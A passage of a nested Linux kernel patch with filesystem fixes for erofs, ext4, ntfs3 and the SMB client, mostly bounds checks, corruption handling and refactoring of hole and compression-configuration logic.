+-			break;
+-		default:
+-			DBG_BUGON(1);
+-			ret = -EFAULT;
+-		}
+-		kfree(data);
+-		if (ret)
+-			break;
+-	}
+-	erofs_put_metabuf(&buf);
+-	return ret;
+-}
+ #else
+-static int erofs_load_compr_cfgs(struct super_block *sb,
+-				 struct erofs_super_block *dsb)
++static int z_erofs_parse_cfgs(struct super_block *sb,
++			      struct erofs_super_block *dsb)
+ {
+-	if (dsb->u1.available_compr_algs) {
+-		erofs_err(sb, "try to load compressed fs when compression is disabled");
+-		return -EINVAL;
+-	}
+-	return 0;
++	if (!dsb->u1.available_compr_algs)
++		return 0;
++
++	erofs_err(sb, "compression disabled, unable to mount compressed EROFS");
++	return -EOPNOTSUPP;
+ }
+ #endif
+ 
+@@ -398,10 +349,7 @@ static int erofs_read_superblock(struct super_block *sb)
+ 	}
+ 
+ 	/* parse on-disk compression configurations */
+-	if (erofs_sb_has_compr_cfgs(sbi))
+-		ret = erofs_load_compr_cfgs(sb, dsb);
+-	else
+-		ret = z_erofs_load_lz4_config(sb, dsb, NULL, 0);
++	ret = z_erofs_parse_cfgs(sb, dsb);
+ 	if (ret < 0)
+ 		goto out;
+ 
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 0337b70b2dac4..abcded1acd194 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -610,7 +610,7 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 		.map = map,
+ 	};
+ 	int err = 0;
+-	unsigned int lclusterbits, endoff;
++	unsigned int lclusterbits, endoff, afmt;
+ 	unsigned long initial_lcn;
+ 	unsigned long long ofs, end;
+ 
+@@ -700,17 +700,20 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 			err = -EFSCORRUPTED;
+ 			goto unmap_out;
+ 		}
+-		if (vi->z_advise & Z_EROFS_ADVISE_INTERLACED_PCLUSTER)
+-			map->m_algorithmformat =
+-				Z_EROFS_COMPRESSION_INTERLACED;
+-		else
+-			map->m_algorithmformat =
+-				Z_EROFS_COMPRESSION_SHIFTED;
+-	} else if (m.headtype == Z_EROFS_VLE_CLUSTER_TYPE_HEAD2) {
+-		map->m_algorithmformat = vi->z_algorithmtype[1];
++		afmt = vi->z_advise & Z_EROFS_ADVISE_INTERLACED_PCLUSTER ?
++			Z_EROFS_COMPRESSION_INTERLACED :
++			Z_EROFS_COMPRESSION_SHIFTED;
+ 	} else {
+-		map->m_algorithmformat = vi->z_algorithmtype[0];
++		afmt = m.headtype == Z_EROFS_VLE_CLUSTER_TYPE_HEAD2 ?
++			vi->z_algorithmtype[1] : vi->z_algorithmtype[0];
++		if (!(EROFS_I_SB(inode)->available_compr_algs & (1 << afmt))) {
++			erofs_err(inode->i_sb, "inconsistent algorithmtype %u for nid %llu",
++				  afmt, vi->nid);
++			err = -EFSCORRUPTED;
++			goto unmap_out;
++		}
+ 	}
++	map->m_algorithmformat = afmt;
+ 
+ 	if ((flags & EROFS_GET_BLOCKS_FIEMAP) ||
+ 	    ((flags & EROFS_GET_BLOCKS_READMORE) &&
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index aa5aadd70bbc2..67af684e44e6e 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -2229,7 +2229,7 @@ static int ext4_fill_es_cache_info(struct inode *inode,
+ 
+ 
+ /*
+- * ext4_ext_determine_hole - determine hole around given block
++ * ext4_ext_find_hole - find hole around given block according to the given path
+  * @inode:	inode we lookup in
+  * @path:	path in extent tree to @lblk
+  * @lblk:	pointer to logical block around which we want to determine hole
+@@ -2241,9 +2241,9 @@ static int ext4_fill_es_cache_info(struct inode *inode,
+  * The function returns the length of a hole starting at @lblk. We update @lblk
+  * to the beginning of the hole if we managed to find it.
+  */
+-static ext4_lblk_t ext4_ext_determine_hole(struct inode *inode,
+-					   struct ext4_ext_path *path,
+-					   ext4_lblk_t *lblk)
++static ext4_lblk_t ext4_ext_find_hole(struct inode *inode,
++				      struct ext4_ext_path *path,
++				      ext4_lblk_t *lblk)
+ {
+ 	int depth = ext_depth(inode);
+ 	struct ext4_extent *ex;
+@@ -2270,30 +2270,6 @@ static ext4_lblk_t ext4_ext_determine_hole(struct inode *inode,
+ 	return len;
+ }
+ 
+-/*
+- * ext4_ext_put_gap_in_cache:
+- * calculate boundaries of the gap that the requested block fits into
+- * and cache this gap
+- */
+-static void
+-ext4_ext_put_gap_in_cache(struct inode *inode, ext4_lblk_t hole_start,
+-			  ext4_lblk_t hole_len)
+-{
+-	struct extent_status es;
+-
+-	ext4_es_find_extent_range(inode, &ext4_es_is_delayed, hole_start,
+-				  hole_start + hole_len - 1, &es);
+-	if (es.es_len) {
+-		/* There's delayed extent containing lblock? */
+-		if (es.es_lblk <= hole_start)
+-			return;
+-		hole_len = min(es.es_lblk - hole_start, hole_len);
+-	}
+-	ext_debug(inode, " -> %u:%u\n", hole_start, hole_len);
+-	ext4_es_insert_extent(inode, hole_start, hole_len, ~0,
+-			      EXTENT_STATUS_HOLE);
+-}
+-
+ /*
+  * ext4_ext_rm_idx:
+  * removes index from the index block.
+@@ -4064,6 +4040,69 @@ static int get_implied_cluster_alloc(struct super_block *sb,
+ 	return 0;
+ }
+ 
++/*
++ * Determine hole length around the given logical block, first try to
++ * locate and expand the hole from the given @path, and then adjust it
++ * if it's partially or completely converted to delayed extents, insert
++ * it into the extent cache tree if it's indeed a hole, finally return
++ * the length of the determined extent.
++ */
++static ext4_lblk_t ext4_ext_determine_insert_hole(struct inode *inode,
++						  struct ext4_ext_path *path,
++						  ext4_lblk_t lblk)
++{
++	ext4_lblk_t hole_start, len;
++	struct extent_status es;
++
++	hole_start = lblk;
++	len = ext4_ext_find_hole(inode, path, &hole_start);
++again:
++	ext4_es_find_extent_range(inode, &ext4_es_is_delayed, hole_start,
++				  hole_start + len - 1, &es);
++	if (!es.es_len)
++		goto insert_hole;
++
++	/*
++	 * There's a delalloc extent in the hole, handle it if the delalloc
++	 * extent is in front of, behind and straddle the queried range.
++	 */
++	if (lblk >= es.es_lblk + es.es_len) {
++		/*
++		 * The delalloc extent is in front of the queried range,
++		 * find again from the queried start block.
++		 */
++		len -= lblk - hole_start;
++		hole_start = lblk;
++		goto again;
++	} else if (in_range(lblk, es.es_lblk, es.es_len)) {
++		/*
++		 * The delalloc extent containing lblk, it must have been
++		 * added after ext4_map_blocks() checked the extent status
++		 * tree, adjust the length to the delalloc extent's after
++		 * lblk.
++		 */
++		len = es.es_lblk + es.es_len - lblk;
++		return len;
++	} else {
++		/*
++		 * The delalloc extent is partially or completely behind
++		 * the queried range, update hole length until the
++		 * beginning of the delalloc extent.
++		 */
++		len = min(es.es_lblk - hole_start, len);
++	}
++
++insert_hole:
++	/* Put just found gap into cache to speed up subsequent requests */
++	ext_debug(inode, " -> %u:%u\n", hole_start, len);
++	ext4_es_insert_extent(inode, hole_start, len, ~0, EXTENT_STATUS_HOLE);
++
++	/* Update hole_len to reflect hole size after lblk */
++	if (hole_start != lblk)
++		len -= lblk - hole_start;
++
++	return len;
++}
+ 
+ /*
+  * Block allocation/map/preallocation routine for extents based files
+@@ -4181,22 +4220,12 @@ int ext4_ext_map_blocks(handle_t *handle, struct inode *inode,
+ 	 * we couldn't try to create block if create flag is zero
+ 	 */
+ 	if ((flags & EXT4_GET_BLOCKS_CREATE) == 0) {
+-		ext4_lblk_t hole_start, hole_len;
++		ext4_lblk_t len;
+ 
+-		hole_start = map->m_lblk;
+-		hole_len = ext4_ext_determine_hole(inode, path, &hole_start);
+-		/*
+-		 * put just found gap into cache to speed up
+-		 * subsequent requests
+-		 */
+-		ext4_ext_put_gap_in_cache(inode, hole_start, hole_len);
++		len = ext4_ext_determine_insert_hole(inode, path, map->m_lblk);
+ 
+-		/* Update hole_len to reflect hole size after map->m_lblk */
+-		if (hole_start != map->m_lblk)
+-			hole_len -= map->m_lblk - hole_start;
+ 		map->m_pblk = 0;
+-		map->m_len = min_t(unsigned int, map->m_len, hole_len);
+-
++		map->m_len = min_t(unsigned int, map->m_len, len);
+ 		goto out;
+ 	}
+ 
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 1a310ee7d9e55..6a3e27771df73 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -831,7 +831,7 @@ mb_update_avg_fragment_size(struct super_block *sb, struct ext4_group_info *grp)
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	int new_order;
+ 
+-	if (!test_opt2(sb, MB_OPTIMIZE_SCAN) || grp->bb_free == 0)
++	if (!test_opt2(sb, MB_OPTIMIZE_SCAN) || grp->bb_fragments == 0)
+ 		return;
+ 
+ 	new_order = mb_avg_fragment_size_order(sb,
+@@ -2176,6 +2176,9 @@ int ext4_mb_try_best_found(struct ext4_allocation_context *ac,
+ 		return err;
+ 
+ 	ext4_lock_group(ac->ac_sb, group);
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)))
++		goto out;
++
+ 	max = mb_find_extent(e4b, ex.fe_start, ex.fe_len, &ex);
+ 
+ 	if (max > 0) {
+@@ -2183,6 +2186,7 @@ int ext4_mb_try_best_found(struct ext4_allocation_context *ac,
+ 		ext4_mb_use_best_found(ac, e4b);
+ 	}
+ 
++out:
+ 	ext4_unlock_group(ac->ac_sb, group);
+ 	ext4_mb_unload_buddy(e4b);
+ 
+@@ -2211,12 +2215,10 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 	if (err)
+ 		return err;
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info))) {
+-		ext4_mb_unload_buddy(e4b);
+-		return 0;
+-	}
+-
+ 	ext4_lock_group(ac->ac_sb, group);
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)))
++		goto out;
++
+ 	max = mb_find_extent(e4b, ac->ac_g_ex.fe_start,
+ 			     ac->ac_g_ex.fe_len, &ex);
+ 	ex.fe_logical = 0xDEADFA11; /* debug value */
+@@ -2249,6 +2251,7 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 		ac->ac_b_ex = ex;
+ 		ext4_mb_use_best_found(ac, e4b);
+ 	}
++out:
+ 	ext4_unlock_group(ac->ac_sb, group);
+ 	ext4_mb_unload_buddy(e4b);
+ 
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 2215179c925b3..2618bf5a37892 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -1658,8 +1658,10 @@ int attr_allocate_frame(struct ntfs_inode *ni, CLST frame, size_t compr_size,
+ 			le_b = NULL;
+ 			attr_b = ni_find_attr(ni, NULL, &le_b, ATTR_DATA, NULL,
+ 					      0, NULL, &mi_b);
+-			if (!attr_b)
+-				return -ENOENT;
++			if (!attr_b) {
++				err = -ENOENT;
++				goto out;
++			}
+ 
+ 			attr = attr_b;
+ 			le = le_b;
+@@ -1740,13 +1742,15 @@ int attr_allocate_frame(struct ntfs_inode *ni, CLST frame, size_t compr_size,
+ ok:
+ 	run_truncate_around(run, vcn);
+ out:
+-	if (new_valid > data_size)
+-		new_valid = data_size;
++	if (attr_b) {
++		if (new_valid > data_size)
++			new_valid = data_size;
+ 
+-	valid_size = le64_to_cpu(attr_b->nres.valid_size);
+-	if (new_valid != valid_size) {
+-		attr_b->nres.valid_size = cpu_to_le64(valid_size);
+-		mi_b->dirty = true;
++		valid_size = le64_to_cpu(attr_b->nres.valid_size);
++		if (new_valid != valid_size) {
++			attr_b->nres.valid_size = cpu_to_le64(valid_size);
++			mi_b->dirty = true;
++		}
+ 	}
+ 
+ 	return err;
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index 0c6a68e71e7d4..723e49ec83ce7 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -127,12 +127,13 @@ struct ATTR_LIST_ENTRY *al_enumerate(struct ntfs_inode *ni,
+ {
+ 	size_t off;
+ 	u16 sz;
++	const unsigned le_min_size = le_size(0);
+ 
+ 	if (!le) {
+ 		le = ni->attr_list.le;
+ 	} else {
+ 		sz = le16_to_cpu(le->size);
+-		if (sz < sizeof(struct ATTR_LIST_ENTRY)) {
++		if (sz < le_min_size) {
+ 			/* Impossible 'cause we should not return such le. */
+ 			return NULL;
+ 		}
+@@ -141,7 +142,7 @@ struct ATTR_LIST_ENTRY *al_enumerate(struct ntfs_inode *ni,
+ 
+ 	/* Check boundary. */
+ 	off = PtrOffset(ni->attr_list.le, le);
+-	if (off + sizeof(struct ATTR_LIST_ENTRY) > ni->attr_list.size) {
++	if (off + le_min_size > ni->attr_list.size) {
+ 		/* The regular end of list. */
+ 		return NULL;
+ 	}
+@@ -149,8 +150,7 @@ struct ATTR_LIST_ENTRY *al_enumerate(struct ntfs_inode *ni,
+ 	sz = le16_to_cpu(le->size);
+ 
+ 	/* Check le for errors. */
+-	if (sz < sizeof(struct ATTR_LIST_ENTRY) ||
+-	    off + sz > ni->attr_list.size ||
++	if (sz < le_min_size || off + sz > ni->attr_list.size ||
+ 	    sz < le->name_off + le->name_len * sizeof(short)) {
+ 		return NULL;
+ 	}
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index d4d9f4ffb6d9a..72cdfa8727d3c 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -309,11 +309,31 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 		return 0;
+ 	}
+ 
+-	/* NTFS: symlinks are "dir + reparse" or "file + reparse" */
+-	if (fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT)
+-		dt_type = DT_LNK;
+-	else
+-		dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
++	/*
++	 * NTFS: symlinks are "dir + reparse" or "file + reparse"
++	 * Unfortunately reparse attribute is used for many purposes (several dozens).
++	 * It is not possible here to know is this name symlink or not.
++	 * To get exactly the type of name we should to open inode (read mft).
++	 * getattr for opened file (fstat) correctly returns symlink.
++	 */
++	dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
++
++	/*
++	 * It is not reliable to detect the type of name using duplicated information
++	 * stored in parent directory.
++	 * The only correct way to get the type of name - read MFT record and find ATTR_STD.
++	 * The code below is not good idea.
++	 * It does additional locks/reads just to get the type of name.
++	 * Should we use additional mount option to enable branch below?
++	 */
++	if ((fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT) &&
++	    ino != ni->mi.rno) {
++		struct inode *inode = ntfs_iget5(sbi->sb, &e->ref, NULL);
++		if (!IS_ERR_OR_NULL(inode)) {
++			dt_type = fs_umode_to_dtype(inode->i_mode);
++			iput(inode);
++		}
++	}
+ 
+ 	return !dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
+ }
+@@ -495,11 +515,9 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 	struct INDEX_HDR *hdr;
+ 	const struct ATTR_FILE_NAME *fname;
+ 	u32 e_size, off, end;
+-	u64 vbo = 0;
+ 	size_t drs = 0, fles = 0, bit = 0;
+-	loff_t i_size = ni->vfs_inode.i_size;
+ 	struct indx_node *node = NULL;
+-	u8 index_bits = ni->dir.index_bits;
++	size_t max_indx = ni->vfs_inode.i_size >> ni->dir.index_bits;
+ 
+ 	if (is_empty)
+ 		*is_empty = true;
+@@ -543,7 +561,7 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 				fles += 1;
+ 		}
+ 
+-		if (vbo >= i_size)
++		if (bit >= max_indx)
+ 			goto out;
+ 
+ 		err = indx_used_bit(&ni->dir, ni, &bit);
+@@ -553,8 +571,7 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 		if (bit == MINUS_ONE_T)
+ 			goto out;
+ 
+-		vbo = (u64)bit << index_bits;
+-		if (vbo >= i_size)
++		if (bit >= max_indx)
+ 			goto out;
+ 
+ 		err = indx_read(&ni->dir, ni, bit << ni->dir.idx2vbn_bits,
+@@ -564,7 +581,6 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 
+ 		hdr = &node->index->ihdr;
+ 		bit += 1;
+-		vbo = (u64)bit << ni->dir.idx2vbn_bits;
+ 	}
+ 
+ out:
+diff --git a/fs/ntfs3/file.c b/fs/ntfs3/file.c
+index f31c0389a2e7d..14efe46df91ef 100644
+--- a/fs/ntfs3/file.c
++++ b/fs/ntfs3/file.c
+@@ -1110,6 +1110,8 @@ static ssize_t ntfs_compress_write(struct kiocb *iocb, struct iov_iter *from)
+ 	iocb->ki_pos += written;
+ 	if (iocb->ki_pos > ni->i_valid)
+ 		ni->i_valid = iocb->ki_pos;
++	if (iocb->ki_pos > i_size)
++		i_size_write(inode, iocb->ki_pos);
+ 
+ 	return written;
+ }
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 710cb5aa5a65b..d53ef128fa733 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -465,7 +465,7 @@ static inline bool is_rst_area_valid(const struct RESTART_HDR *rhdr)
+ {
+ 	const struct RESTART_AREA *ra;
+ 	u16 cl, fl, ul;
+-	u32 off, l_size, file_dat_bits, file_size_round;
++	u32 off, l_size, seq_bits;
+ 	u16 ro = le16_to_cpu(rhdr->ra_off);
+ 	u32 sys_page = le32_to_cpu(rhdr->sys_page_size);
+ 
+@@ -511,13 +511,15 @@ static inline bool is_rst_area_valid(const struct RESTART_HDR *rhdr)
+ 	/* Make sure the sequence number bits match the log file size. */
+ 	l_size = le64_to_cpu(ra->l_size);
+ 
+-	file_dat_bits = sizeof(u64) * 8 - le32_to_cpu(ra->seq_num_bits);
+-	file_size_round = 1u << (file_dat_bits + 3);
+-	if (file_size_round != l_size &&
+-	    (file_size_round < l_size || (file_size_round / 2) > l_size)) {
+-		return false;
++	seq_bits = sizeof(u64) * 8 + 3;
++	while (l_size) {
++		l_size >>= 1;
++		seq_bits -= 1;
+ 	}
+ 
++	if (seq_bits != ra->seq_num_bits)
++		return false;
++
+ 	/* The log page data offset and record header length must be quad-aligned. */
+ 	if (!IS_ALIGNED(le16_to_cpu(ra->data_off), 8) ||
+ 	    !IS_ALIGNED(le16_to_cpu(ra->rec_hdr_len), 8))
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 4b72bc7f12ca3..1eac80d55b554 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -976,6 +976,30 @@ static inline __le32 security_hash(const void *sd, size_t bytes)
+ 	return cpu_to_le32(hash);
+ }
+ 
++/*
++ * simple wrapper for sb_bread_unmovable.
++ */
++struct buffer_head *ntfs_bread(struct super_block *sb, sector_t block)
++{
++	struct ntfs_sb_info *sbi = sb->s_fs_info;
++	struct buffer_head *bh;
++
++	if (unlikely(block >= sbi->volume.blocks)) {
++		/* prevent generic message "attempt to access beyond end of device" */
++		ntfs_err(sb, "try to read out of volume at offset 0x%llx",
++			 (u64)block << sb->s_blocksize_bits);
++		return NULL;
++	}
++
++	bh = sb_bread_unmovable(sb, block);
++	if (bh)
++		return bh;
++
++	ntfs_err(sb, "failed to read volume at offset 0x%llx",
++		 (u64)block << sb->s_blocksize_bits);
++	return NULL;
++}
++
+ int ntfs_sb_read(struct super_block *sb, u64 lbo, size_t bytes, void *buffer)
+ {
+ 	struct block_device *bdev = sb->s_bdev;
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index dc937089a464a..42dd9fdaf4151 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -402,7 +402,6 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		goto out;
+ 
+ 	if (!is_match && name) {
+-		/* Reuse rec as buffer for ascii name. */
+ 		err = -ENOENT;
+ 		goto out;
+ 	}
+@@ -417,6 +416,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 
+ 	if (names != le16_to_cpu(rec->hard_links)) {
+ 		/* Correct minor error on the fly. Do not mark inode as dirty. */
++		ntfs_inode_warn(inode, "Correct links count -> %u.", names);
+ 		rec->hard_links = cpu_to_le16(names);
+ 		ni->mi.dirty = true;
+ 	}
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 0f38d558169a1..ba26a465b3091 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -517,12 +517,10 @@ struct ATTR_LIST_ENTRY {
+ 	__le64 vcn;		// 0x08: Starting VCN of this attribute.
+ 	struct MFT_REF ref;	// 0x10: MFT record number with attribute.
+ 	__le16 id;		// 0x18: struct ATTRIB ID.
+-	__le16 name[3];		// 0x1A: Just to align. To get real name can use bNameOffset.
++	__le16 name[];		// 0x1A: Just to align. To get real name can use name_off.
+ 
+ }; // sizeof(0x20)
+ 
+-static_assert(sizeof(struct ATTR_LIST_ENTRY) == 0x20);
+-
+ static inline u32 le_size(u8 name_len)
+ {
+ 	return ALIGN(offsetof(struct ATTR_LIST_ENTRY, name) +
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 74482ef569ab7..0f9bec29f2b70 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -580,6 +580,7 @@ bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes);
+ int log_replay(struct ntfs_inode *ni, bool *initialized);
+ 
+ /* Globals from fsntfs.c */
++struct buffer_head *ntfs_bread(struct super_block *sb, sector_t block);
+ bool ntfs_fix_pre_write(struct NTFS_RECORD_HEADER *rhdr, size_t bytes);
+ int ntfs_fix_post_read(struct NTFS_RECORD_HEADER *rhdr, size_t bytes,
+ 		       bool simple);
+@@ -1012,19 +1013,6 @@ static inline u64 bytes_to_block(const struct super_block *sb, u64 size)
+ 	return (size + sb->s_blocksize - 1) >> sb->s_blocksize_bits;
+ }
+ 
+-static inline struct buffer_head *ntfs_bread(struct super_block *sb,
+-					     sector_t block)
+-{
+-	struct buffer_head *bh = sb_bread(sb, block);
+-
+-	if (bh)
+-		return bh;
+-
+-	ntfs_err(sb, "failed to read volume at offset 0x%llx",
+-		 (u64)block << sb->s_blocksize_bits);
+-	return NULL;
+-}
+-
+ static inline struct ntfs_inode *ntfs_i(struct inode *inode)
+ {
+ 	return container_of(inode, struct ntfs_inode, vfs_inode);
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index ba336c7280b85..a8d4ed7bca025 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -226,11 +226,6 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 			return NULL;
+ 		}
+ 
+-		if (off + asize < off) {
+-			/* overflow check */
+-			return NULL;
+-		}
+-
+ 		attr = Add2Ptr(attr, asize);
+ 		off += asize;
+ 	}
+@@ -253,8 +248,8 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 	if ((t32 & 0xf) || (t32 > 0x100))
+ 		return NULL;
+ 
+-	/* Check boundary. */
+-	if (off + asize > used)
++	/* Check overflow and boundary. */
++	if (off + asize < off || off + asize > used)
+ 		return NULL;
+ 
+ 	/* Check size of attribute. */
+@@ -491,8 +486,20 @@ bool mi_remove_attr(struct ntfs_inode *ni, struct mft_inode *mi,
+ 		return false;
+ 
+ 	if (ni && is_attr_indexed(attr)) {
+-		le16_add_cpu(&ni->mi.mrec->hard_links, -1);
+-		ni->mi.dirty = true;
++		u16 links = le16_to_cpu(ni->mi.mrec->hard_links);
++		struct ATTR_FILE_NAME *fname =
++			attr->type != ATTR_NAME ?
++				NULL :
++				resident_data_ex(attr,
++						 SIZEOF_ATTRIBUTE_FILENAME);
++		if (fname && fname->type == FILE_NAME_DOS) {
++			/* Do not decrease links count deleting DOS name. */
++		} else if (!links) {
++			/* minor error. Not critical. */
++		} else {
++			ni->mi.mrec->hard_links = cpu_to_le16(links - 1);
++			ni->mi.dirty = true;
++		}
+ 	}
+ 
+ 	used -= asize;
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index df15e00c2a3a0..d98cf7b382bcc 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -217,6 +217,9 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 		if (!ea->name_len)
+ 			break;
+ 
++		if (ea->name_len > ea_size)
++			break;
++
+ 		if (buffer) {
+ 			/* Check if we can use field ea->name */
+ 			if (off + ea_size > size)
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index 6f4d7aa70e5a2..fd082151c5f9b 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -149,7 +149,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		return -EOPNOTSUPP;
+ 
+ 	ses = tcon->ses;
+-	server = ses->server;
++	server = cifs_pick_channel(ses);
+ 	cfids = tcon->cfids;
+ 
+ 	if (!server->ops->new_lease_key)
+diff --git a/fs/smb/client/cifsencrypt.c b/fs/smb/client/cifsencrypt.c
+index d0ac2648c0d61..d3d4cf6321fd5 100644
+--- a/fs/smb/client/cifsencrypt.c
++++ b/fs/smb/client/cifsencrypt.c
+@@ -444,7 +444,7 @@ static int calc_ntlmv2_hash(struct cifs_ses *ses, char *ntlmv2_hash,
+ 		len = cifs_strtoUTF16(user, ses->user_name, len, nls_cp);
+ 		UniStrupr(user);
+ 	} else {
+-		memset(user, '\0', 2);
++		*(u16 *)user = 0;
+ 	}
+ 
+ 	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 7f1aea4c11b9c..58bb54994e22a 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -86,7 +86,7 @@
+ #define SMB_INTERFACE_POLL_INTERVAL	600
+ 
+ /* maximum number of PDUs in one compound */
+-#define MAX_COMPOUND 5
++#define MAX_COMPOUND 7
+ 
+ /*
+  * Default number of credits to keep available for SMB3.
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+index f4818599c00a2..4d5302b58b534 100644
+--- a/fs/smb/client/fs_context.c
++++ b/fs/smb/client/fs_context.c
+@@ -209,7 +209,7 @@ cifs_parse_security_flavors(struct fs_context *fc, char *value, struct smb3_fs_c
+ 
+ 	switch (match_token(value, cifs_secflavor_tokens, args)) {
+ 	case Opt_sec_krb5p:
+-		cifs_errorf(fc, "sec=krb5p is not supported!\n");
++		cifs_errorf(fc, "sec=krb5p is not supported. Use sec=krb5,seal instead\n");
+ 		return 1;
+ 	case Opt_sec_krb5i:
+ 		ctx->sign = true;
+diff --git a/fs/smb/client/readdir.c b/fs/smb/client/readdir.c
+index 2d75ba5aaa8ad..5990bdbae598f 100644
+--- a/fs/smb/client/readdir.c
++++ b/fs/smb/client/readdir.c
+@@ -304,14 +304,16 @@ cifs_dir_info_to_fattr(struct cifs_fattr *fattr, FILE_DIRECTORY_INFO *info,
+ }
+ 
+ static void cifs_fulldir_info_to_fattr(struct cifs_fattr *fattr,
+-				       SEARCH_ID_FULL_DIR_INFO *info,
++				       const void *info,
+ 				       struct cifs_sb_info *cifs_sb)
+ {
++	const FILE_FULL_DIRECTORY_INFO *di = info;
++
+ 	__dir_info_to_fattr(fattr, info);
+ 
+-	/* See MS-FSCC 2.4.19 FileIdFullDirectoryInformation */
++	/* See MS-FSCC 2.4.14, 2.4.19 */
+ 	if (fattr->cf_cifsattrs & ATTR_REPARSE)
+-		fattr->cf_cifstag = le32_to_cpu(info->EaSize);
++		fattr->cf_cifstag = le32_to_cpu(di->EaSize);
+ 	cifs_fill_common_info(fattr, cifs_sb);
+ }
+ 
+@@ -425,7 +427,7 @@ _initiate_cifs_search(const unsigned int xid, struct file *file,
+ 	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+ 		cifsFile->srch_inf.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
+ 	} else /* not srvinos - BB fixme add check for backlevel? */ {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_FULL_DIRECTORY_INFO;
+ 	}
+ 
+ 	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
+@@ -1019,10 +1021,9 @@ static int cifs_filldir(char *find_entry, struct file *file,
+ 				       (FIND_FILE_STANDARD_INFO *)find_entry,
+ 				       cifs_sb);
+ 		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
+ 	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		cifs_fulldir_info_to_fattr(&fattr,
+-					   (SEARCH_ID_FULL_DIR_INFO *)find_entry,
+-					   cifs_sb);
++		cifs_fulldir_info_to_fattr(&fattr, find_entry, cifs_sb);
+ 		break;
+ 	default:
+ 		cifs_dir_info_to_fattr(&fattr,
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index c1fc1651d8b69..4c1231496a725 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
